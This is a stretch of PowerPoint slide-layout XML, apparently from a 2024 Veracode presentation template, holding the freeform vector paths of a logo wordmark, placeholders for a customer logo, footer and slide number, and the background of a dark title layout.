                <a:gd name="connsiteX26" fmla="*/ 530543 w 865822"/>
                <a:gd name="connsiteY26" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX27" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY27" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX28" fmla="*/ 444818 w 865822"/>
                <a:gd name="connsiteY28" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX29" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY29" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX30" fmla="*/ 500063 w 865822"/>
                <a:gd name="connsiteY30" fmla="*/ 171450 h 263842"/>
                <a:gd name="connsiteX31" fmla="*/ 565785 w 865822"/>
                <a:gd name="connsiteY31" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX32" fmla="*/ 678180 w 865822"/>
                <a:gd name="connsiteY32" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX33" fmla="*/ 699135 w 865822"/>
                <a:gd name="connsiteY33" fmla="*/ 209550 h 263842"/>
                <a:gd name="connsiteX34" fmla="*/ 785813 w 865822"/>
                <a:gd name="connsiteY34" fmla="*/ 209550 h 263842"/>
                <a:gd name="connsiteX35" fmla="*/ 806768 w 865822"/>
                <a:gd name="connsiteY35" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX36" fmla="*/ 865823 w 865822"/>
                <a:gd name="connsiteY36" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX37" fmla="*/ 765810 w 865822"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX38" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX39" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY39" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX40" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY40" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX41" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY41" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX42" fmla="*/ 528638 w 865822"/>
                <a:gd name="connsiteY42" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX43" fmla="*/ 572453 w 865822"/>
                <a:gd name="connsiteY43" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX44" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY44" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX45" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY45" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX46" fmla="*/ 741998 w 865822"/>
                <a:gd name="connsiteY46" fmla="*/ 86678 h 263842"/>
                <a:gd name="connsiteX47" fmla="*/ 766763 w 865822"/>
                <a:gd name="connsiteY47" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX48" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY48" fmla="*/ 158115 h 26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865822" h="263842">
                  <a:moveTo>
                    <a:pt x="260985" y="262890"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412433" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="262890"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="123825" y="164783"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="109538" y="128588"/>
                    <a:pt x="60008" y="0"/>
                    <a:pt x="60008" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105728" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140970" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187643" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187643" y="0"/>
                    <a:pt x="138113" y="128588"/>
                    <a:pt x="123825" y="164783"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="720090" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="624840" y="252413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="169545"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="591503" y="162878"/>
                    <a:pt x="627698" y="141923"/>
                    <a:pt x="627698" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627698" y="61913"/>
                    <a:pt x="618173" y="38100"/>
                    <a:pt x="601980" y="22860"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584835" y="6668"/>
                    <a:pt x="562928" y="0"/>
                    <a:pt x="530543" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="444818" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444818" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678180" y="263843"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="678180" y="263843"/>
                    <a:pt x="690563" y="231458"/>
                    <a:pt x="699135" y="209550"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="785813" y="209550"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="794385" y="231458"/>
                    <a:pt x="806768" y="263843"/>
                    <a:pt x="806768" y="263843"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="865823" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765810" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720090" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="515303" y="125730"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="501015" y="125730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501015" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528638" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="561023" y="52388"/>
                    <a:pt x="572453" y="70485"/>
                    <a:pt x="572453" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="572453" y="97155"/>
                    <a:pt x="572453" y="125730"/>
                    <a:pt x="515303" y="125730"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="717233" y="158115"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="726758" y="132398"/>
                    <a:pt x="738188" y="99060"/>
                    <a:pt x="741998" y="86678"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="766763" y="158115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717233" y="158115"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183" name="Freeform: Shape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{125B7AEF-09A0-4FEE-4182-E4345C5307E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6156886" y="1766793"/>
              <a:ext cx="151447" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY3" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY4" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX5" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY7" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY8" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY9" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY10" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY11" fmla="*/ 52388 h 262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447" h="262890">
                  <a:moveTo>
                    <a:pt x="151448" y="52388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="52388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184" name="Freeform: Shape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FD979DD-FE6C-6A04-6153-6FE8D91DF765}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334879" y="1762031"/>
              <a:ext cx="263842" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 195263 w 263842"/>
                <a:gd name="connsiteY1" fmla="*/ 82868 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 199073 w 263842"/>
                <a:gd name="connsiteY2" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 203835 w 263842"/>
                <a:gd name="connsiteY3" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 263842 w 263842"/>
                <a:gd name="connsiteY4" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 255270 w 263842"/>
                <a:gd name="connsiteY5" fmla="*/ 71438 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 215265 w 263842"/>
                <a:gd name="connsiteY6" fmla="*/ 25718 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 263842"/>
                <a:gd name="connsiteY8" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY9" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 254317 w 263842"/>
                <a:gd name="connsiteY10" fmla="*/ 202883 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 262890 w 263842"/>
                <a:gd name="connsiteY11" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 197167 w 263842"/>
                <a:gd name="connsiteY12" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 194310 w 263842"/>
                <a:gd name="connsiteY13" fmla="*/ 191453 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY14" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 55245 w 263842"/>
                <a:gd name="connsiteY15" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY16" fmla="*/ 52388 h 272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3842" h="272415">
                  <a:moveTo>
                    <a:pt x="135255" y="52388"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169545" y="52388"/>
                    <a:pt x="188595" y="74295"/>
                    <a:pt x="195263" y="82868"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199073" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203835" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263842" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255270" y="71438"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="248602" y="60008"/>
                    <a:pt x="239077" y="42863"/>
                    <a:pt x="215265" y="25718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183832" y="2858"/>
                    <a:pt x="148590" y="0"/>
                    <a:pt x="135255" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60960" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210503"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="135255" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184785" y="272415"/>
                    <a:pt x="229552" y="246698"/>
                    <a:pt x="254317" y="202883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="262890" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197167" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194310" y="191453"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179070" y="209550"/>
                    <a:pt x="157163" y="220028"/>
                    <a:pt x="135255" y="220028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92392" y="220028"/>
                    <a:pt x="55245" y="180975"/>
                    <a:pt x="55245" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54292" y="89535"/>
                    <a:pt x="90488" y="52388"/>
                    <a:pt x="135255" y="52388"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185" name="Freeform: Shape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D514460-3E07-FC69-7091-4894019CAAD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5986389" y="1766793"/>
              <a:ext cx="148589" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY2" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY3" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 93345 w 148589"/>
                <a:gd name="connsiteY4" fmla="*/ 132398 h 262890"/>
                <a:gd name="connsiteX5" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY7" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY8" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 115252 w 148589"/>
                <a:gd name="connsiteY9" fmla="*/ 224790 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 148590 w 148589"/>
                <a:gd name="connsiteY10" fmla="*/ 131445 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 121920 w 148589"/>
                <a:gd name="connsiteY11" fmla="*/ 47625 h 262890"/>
                <a:gd name="connsiteX12" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 262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89" h="262890">
                  <a:moveTo>
                    <a:pt x="14288" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14288" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77152" y="52388"/>
                    <a:pt x="93345" y="102870"/>
                    <a:pt x="93345" y="132398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93345" y="202883"/>
                    <a:pt x="37147" y="210503"/>
                    <a:pt x="13335" y="210503"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13335" y="262890"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57150" y="262890"/>
                    <a:pt x="89535" y="250508"/>
                    <a:pt x="115252" y="224790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135255" y="204788"/>
                    <a:pt x="148590" y="167640"/>
                    <a:pt x="148590" y="131445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148590" y="102870"/>
                    <a:pt x="138113" y="71438"/>
                    <a:pt x="121920" y="47625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98108" y="16193"/>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="14288" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{819A42C7-121C-F958-9F15-B6A996A56597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697133" y="386955"/>
            <a:ext cx="2217737" cy="1065212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Customer logo goes here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31652845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9_Title_Dark_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="tx1"/>
            </a:gs>
            <a:gs pos="98000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="13500000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A blue background with circles&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8485698-100F-7F98-5457-AA28A9459F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="14865"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="12192"/>
            <a:ext cx="12192000" cy="6845808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89973C60-DE82-2D1D-1EA1-C05AA4AEB4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6096000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="53000">
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FEF06BE-6D56-6DE1-1406-2D924A8A8F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{446E67FC-D985-4C9C-FC71-5E1FAD303C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2884991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2_Content_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="1">
